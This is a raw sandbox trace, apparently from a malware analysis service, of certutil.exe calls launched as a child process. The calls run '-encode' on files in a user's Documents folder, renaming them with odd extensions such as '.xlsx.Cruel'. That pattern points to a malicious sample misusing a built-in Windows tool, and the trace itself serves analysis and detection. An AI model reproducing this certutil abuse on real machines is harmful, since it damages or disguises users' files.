lpString2="pin", cchCount2=-1) returned 1 [0307.795] SetLastError (dwErrCode=0x80070716) [0307.795] _vsnwprintf (in: _Buffer=0xbeb637f108, _BufferCount=0xb, _Format="%d", _ArgList=0xbeb637f0f8 | out: _Buffer="465") returned 3 [0307.795] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xbeb637eec0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0307.795] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x27a682dbfd0 [0307.795] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0307.795] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0307.795] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xbeb637eea0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0307.795] GetLastError () returned 0xcb [0307.795] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0307.796] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0307.796] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0307.796] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0307.796] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0307.796] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0307.796] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0307.796] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0307.796] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0307.796] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0307.796] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0307.796] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0307.796] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0307.796] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0307.796] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0307.796] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0307.796] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0307.796] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0307.796] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0307.796] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0307.796] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0307.797] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xbeb637eb68 | out: phkResult=0xbeb637eb68*=0x23c) returned 0x0 [0307.797] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x27a682db290 [0307.797] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xbeb637f0d8, lpData=0xbeb637f108, lpcbData=0xbeb637f0d0*=0x4 | out: lpType=0xbeb637f0d8*=0x0, lpData=0xbeb637f108*=0x0, lpcbData=0xbeb637f0d0*=0x4) returned 0x2 [0307.797] LocalFree (hMem=0x27a682db290) returned 0x0 [0307.797] RegCloseKey (hKey=0x23c) returned 0x0 [0307.797] LocalFree (hMem=0x0) returned 0x0 [0307.797] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x27a682fcbb0 [0307.819] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0307.819] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0307.819] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0307.819] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0307.819] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0307.820] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0307.820] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x27a68301c80 [0307.820] GetComputerNameW (in: lpBuffer=0x27a68301c80, nSize=0xbeb637f0d0 | out: lpBuffer="NQDPDE", nSize=0xbeb637f0d0) returned 1 [0307.821] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xbeb637f0a0 | out: lpBuffer=0x0, nSize=0xbeb637f0a0) returned 0 [0307.821] GetLastError () returned 0xea [0307.821] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x27a682eb690 [0307.821] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x27a682eb690, nSize=0xbeb637f0a0 | out: lpBuffer="NQdPdE", nSize=0xbeb637f0a0) returned 1 [0307.821] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0307.827] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x27a68301cf0, cbCertEncoded=0x1670b) returned 0x0 [0307.833] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x27a68301cf0, cbCrlEncoded=0x1670b) returned 0x0 [0307.836] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x27a68301cf0, cbEncoded=0x1670b, dwFlags=0x8000, pDecodePara=0xbeb637ef80, pvStructInfo=0xbeb637f010, pcbStructInfo=0xbeb637f004 | out: pvStructInfo=0xbeb637f010, pcbStructInfo=0xbeb637f004) returned 0 [0307.836] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x27a68301cf0, cbEncoded=0x1670b, dwFlags=0x8000, pDecodePara=0xbeb637ef80, pvStructInfo=0xbeb637f010, pcbStructInfo=0xbeb637f004 | out: pvStructInfo=0xbeb637f010, pcbStructInfo=0xbeb637f004) returned 0 [0307.836] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x27a68301cf0, cbEncoded=0x1670b, dwFlags=0x8000, pDecodePara=0xbeb637ef80, pvStructInfo=0xbeb637f010, pcbStructInfo=0xbeb637f004 | out: pvStructInfo=0xbeb637f010, pcbStructInfo=0xbeb637f004) returned 0 [0307.837] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x27a682dd020 [0307.852] CryptMsgUpdate (hCryptMsg=0x27a682dd020, pbData=0x27a68301cf0, cbData=0x1670b, fFinal=1) returned 0 [0307.852] GetLastError () returned 0x8009310b [0307.852] CryptMsgClose (hCryptMsg=0x27a682dd020) returned 1 [0307.853] GetFileAttributesExW (in: lpFileName="21UCEaK S0K_31H.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\21uceak s0k_31h.pptx.sister"), fInfoLevelId=0x0, lpFileInformation=0xbeb637f030 | out: lpFileInformation=0xbeb637f030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192b1c40, ftCreationTime.dwHighDateTime=0x1d5e90d, ftLastAccessTime.dwLowDateTime=0xae74540, ftLastAccessTime.dwHighDateTime=0x1d5ead5, ftLastWriteTime.dwLowDateTime=0xae74540, ftLastWriteTime.dwHighDateTime=0x1d5ead5, nFileSizeHigh=0x0, nFileSizeLow=0x1670b)) returned 1 [0307.853] _vsnwprintf (in: _Buffer=0xbeb637f038, _BufferCount=0xb, _Format="%d", _ArgList=0xbeb637f028 | out: _Buffer="359") returned 3 [0307.853] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xbeb637edf0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0307.853] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x27a683015f0 [0307.853] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.853] _vsnwprintf (in: _Buffer=0xbeb637e020, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xbeb637f078 | out: _Buffer="Input Length = 91915") returned 20 [0307.853] GetFileType (hFile=0x50) returned 0x2 [0307.853] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xbeb637e020*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xbeb637dfd4, lpReserved=0x0 | out: lpBuffer=0xbeb637e020*, lpNumberOfCharsWritten=0xbeb637dfd4*=0x14) returned 1 [0307.855] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.855] _vsnwprintf (in: _Buffer=0xbeb637e020, _BufferCount=0x1ff, _Format="\n", _ArgList=0xbeb637f078 | out: _Buffer="\n") returned 1 [0307.855] GetFileType (hFile=0x50) returned 0x2 [0307.855] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xbeb637e020*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xbeb637dfd4, lpReserved=0x0 | out: lpBuffer=0xbeb637e020*, lpNumberOfCharsWritten=0xbeb637dfd4*=0x1) returned 1 [0307.897] GetFileAttributesExW (in: lpFileName="21UCEaK S0K_31H.pptx.Cruel" (normalized: "c:\\users\\fd1hvy\\documents\\21uceak s0k_31h.pptx.cruel"), fInfoLevelId=0x0, lpFileInformation=0xbeb637f030 | out: lpFileInformation=0xbeb637f030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe21cd53e, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xe21cd53e, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe2213437, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1edea)) returned 1 [0307.897] _vsnwprintf (in: _Buffer=0xbeb637f038, _BufferCount=0xb, _Format="%d", _ArgList=0xbeb637f028 | out: _Buffer="361") returned 3 [0307.897] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xbeb637edf0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0307.897] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x27a68301ad0 [0307.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.897] _vsnwprintf (in: _Buffer=0xbeb637e020, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xbeb637f078 | out: _Buffer="Output Length = 126442") returned 22 [0307.897] GetFileType (hFile=0x50) returned 0x2 [0307.897] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xbeb637e020*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xbeb637dfd4, lpReserved=0x0 | out: lpBuffer=0xbeb637e020*, lpNumberOfCharsWritten=0xbeb637dfd4*=0x16) returned 1 [0307.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.900] _vsnwprintf (in: _Buffer=0xbeb637e020, _BufferCount=0x1ff, _Format="\n", _ArgList=0xbeb637f078 | out: _Buffer="\n") returned 1 [0307.900] GetFileType (hFile=0x50) returned 0x2 [0307.900] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xbeb637e020*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xbeb637dfd4, lpReserved=0x0 | out: lpBuffer=0xbeb637e020*, lpNumberOfCharsWritten=0xbeb637dfd4*=0x1) returned 1 [0307.904] LocalFree (hMem=0x27a68301cf0) returned 0x0 [0307.904] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0307.904] _vsnwprintf (in: _Buffer=0xbeb637f098, _BufferCount=0xb, _Format="%d", _ArgList=0xbeb637f088 | out: _Buffer="2022") returned 4 [0307.904] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xbeb637ee50, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0307.904] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x27a682d8cf0 [0307.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.905] _vsnwprintf (in: _Buffer=0xbeb637e080, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xbeb637f0d8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0307.905] GetFileType (hFile=0x50) returned 0x2 [0307.905] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xbeb637e080*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xbeb637e034, lpReserved=0x0 | out: lpBuffer=0xbeb637e080*, lpNumberOfCharsWritten=0xbeb637e034*=0x31) returned 1 [0307.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.905] _vsnwprintf (in: _Buffer=0xbeb637e080, _BufferCount=0x1ff, _Format="\n", _ArgList=0xbeb637f0d8 | out: _Buffer="\n") returned 1 [0307.906] GetFileType (hFile=0x50) returned 0x2 [0307.906] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xbeb637e080*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xbeb637e034, lpReserved=0x0 | out: lpBuffer=0xbeb637e080*, lpNumberOfCharsWritten=0xbeb637e034*=0x1) returned 1 [0307.913] LocalFree (hMem=0x0) returned 0x0 [0307.913] LocalFree (hMem=0x27a682d95b0) returned 0x0 [0307.913] LocalFree (hMem=0x27a682d4430) returned 0x0 [0307.913] SetLastError (dwErrCode=0x80070716) [0307.913] _vsnwprintf (in: _Buffer=0xbeb637f108, _BufferCount=0xb, _Format="%d", _ArgList=0xbeb637f0f8 | out: _Buffer="511") returned 3 [0307.913] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xbeb637eec0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0307.913] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x27a683019b0 [0307.913] PostQuitMessage (nExitCode=0) [0307.913] GetMessageW (in: lpMsg=0xbeb637f700, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xbeb637f700) returned 0 [0307.914] LocalFree (hMem=0x27a682eb690) returned 0x0 [0307.914] LocalFree (hMem=0x27a68301c80) returned 0x0 [0307.914] LocalFree (hMem=0x0) returned 0x0 [0307.914] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0307.914] GetLastError () returned 0x7e [0307.914] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0307.915] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0307.915] DllMain () returned 0x1 [0307.915] LocalFree (hMem=0x27a682eb610) returned 0x0 [0307.915] LocalFree (hMem=0x27a682dbfd0) returned 0x0 [0307.915] LocalFree (hMem=0x27a683015f0) returned 0x0 [0307.915] LocalFree (hMem=0x27a68301ad0) returned 0x0 [0307.915] LocalFree (hMem=0x27a682d8cf0) returned 0x0 [0307.915] LocalFree (hMem=0x27a683019b0) returned 0x0 [0307.915] LocalFree (hMem=0x27a682e46e0) returned 0x0 [0307.915] LocalFree (hMem=0x27a682dc0c0) returned 0x0 [0307.915] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0307.915] GetLastError () returned 0x7e [0307.915] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0307.916] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0307.916] DllMain () returned 0x1 [0307.916] exit (_Code=0) Thread: id = 142 os_tid = 0x13c4 Process: id = "58" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0xc7ac000" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 143 os_tid = 0x368 [0308.242] GetStartupInfoW (in: lpStartupInfo=0x7b9199fc40 | out: lpStartupInfo=0x7b9199fc40*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0308.248] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0308.249] __set_app_type (_Type=0x1) [0308.249] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0308.249] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0308.253] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0308.253] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0308.253] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0308.254] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0308.254] WerSetFlags () returned 0x0 [0308.254] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0308.254] __iob_func () returned 0x7ffcea2dea00 [0308.254] _fileno (_File=0x7ffcea2dea30) returned 1 [0308.254] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0308.254] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0308.256] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0308.256] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0308.256] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0308.256] GetConsoleOutputCP () returned 0x1b5 [0308.257] _vsnwprintf (in: _Buffer=0x7b9199fbb0, _BufferCount=0xb, _Format=".%d", _ArgList=0x7b9199fad8 | out: _Buffer=".437") returned 4 [0308.257] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0308.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.257] GetFileType (hFile=0x50) returned 0x2 [0308.257] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0308.257] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0308.258] SetThreadUILanguage (LangId=0x0) returned 0x409 [0308.258] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0308.258] GetCommandLineW () returned="certutil -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\"" [0308.258] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2435cbbb7a0 [0308.259] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2435cbacf30 [0308.259] LocalFree (hMem=0x2435cbbb7a0) returned 0x0 [0308.259] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2435cbab860 [0308.259] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2435cbabb30 [0308.259] LocalFree (hMem=0x2435cbab860) returned 0x0 [0308.259] LocalFree (hMem=0x2435cbacf30) returned 0x0 [0308.259] LocalFree (hMem=0x0) returned 0x0 [0308.259] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0308.259] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0308.260] GetCommandLineW () returned="certutil -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\"" [0308.260] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2435cbbbb40 [0308.260] GetSystemTime (in: lpSystemTime=0x7b9199f8a0 | out: lpSystemTime=0x7b9199f8a0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x16, wMilliseconds=0x320)) [0308.260] SystemTimeToFileTime (in: lpSystemTime=0x7b9199f8a0, lpFileTime=0x7b9199f898 | out: lpFileTime=0x7b9199f898) returned 1 [0308.260] FileTimeToLocalFileTime (in: lpFileTime=0x7b9199f898, lpLocalFileTime=0x7b9199f860 | out: lpLocalFileTime=0x7b9199f860) returned 1 [0308.260] FileTimeToSystemTime (in: lpFileTime=0x7b9199f860, lpSystemTime=0x7b9199f5d0 | out: lpSystemTime=0x7b9199f5d0) returned 1 [0308.260] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x7b9199f5d0, lpFormat=0x0, lpDateStr=0x7b9199f6e0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0308.260] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x7b9199f5d0, lpFormat=0x0, lpTimeStr=0x7b9199f5e0, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0308.260] _vsnwprintf (in: _Buffer=0x7b9199f5ee, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x7b9199f5b8 | out: _Buffer=" 22.800s") returned 8 [0308.260] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2435cbbe140 [0308.260] SetLastError (dwErrCode=0x80070716) [0308.260] _vsnwprintf (in: _Buffer=0x7b9199f668, _BufferCount=0xb, _Format="%d", _ArgList=0x7b9199f658 | out: _Buffer="948") returned 3 [0308.261] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x7b9199f420, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0308.261] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2435cbbbac0 [0308.261] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2435cbb4300 [0308.261] LocalFree (hMem=0x2435cbbe140) returned 0x0 [0308.261] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7b9199f910 | out: lpSystemTimeAsFileTime=0x7b9199f910*(dwLowDateTime=0xe258befd, dwHighDateTime=0x1d6141f)) [0308.261] GetLocalTime (in: lpSystemTime=0x7b9199f948 | out: lpSystemTime=0x7b9199f948*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x16, wMilliseconds=0x321)) [0308.261] SystemTimeToFileTime (in: lpSystemTime=0x7b9199f948, lpFileTime=0x7b9199f920 | out: lpFileTime=0x7b9199f920) returned 1 [0308.261] CompareFileTime (lpFileTime1=0x7b9199f920, lpFileTime2=0x7b9199f910) returned 1 [0308.261] _vsnwprintf (in: _Buffer=0x7b9199f958, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x7b9199f8e8 | out: _Buffer="GMT + 2.00") returned 10 [0308.262] LocalFree (hMem=0x2435cbbbb40) returned 0x0 [0308.262] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0308.262] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0308.262] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0308.262] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0308.262] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0308.262] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x7b9199f988 | out: _Buffer="10.0.15063.447") returned 14 [0308.262] GetACP () returned 0x4e4 [0308.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0308.262] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2435cbbbaa0 [0308.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2435cbbbaa0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0308.262] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2435cbbde00 [0308.262] _vsnwprintf (in: _Buffer=0x2435cbbde00, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x7b9199f9d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0308.262] LocalFree (hMem=0x2435cbbbaa0) returned 0x0 [0308.262] LocalFree (hMem=0x0) returned 0x0 [0308.262] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0308.365] GetACP () returned 0x4e4 [0308.365] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0308.365] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2435cbbb960 [0308.365] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2435cbbb960, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0308.365] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2435cbbe180 [0308.365] _vsnwprintf (in: _Buffer=0x2435cbbe180, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x7b9199f9d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0308.366] LocalFree (hMem=0x2435cbbb960) returned 0x0 [0308.366] LocalFree (hMem=0x0) returned 0x0 [0308.366] GetACP () returned 0x4e4 [0308.366] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0308.366] LocalAlloc (uFlags=0x0, 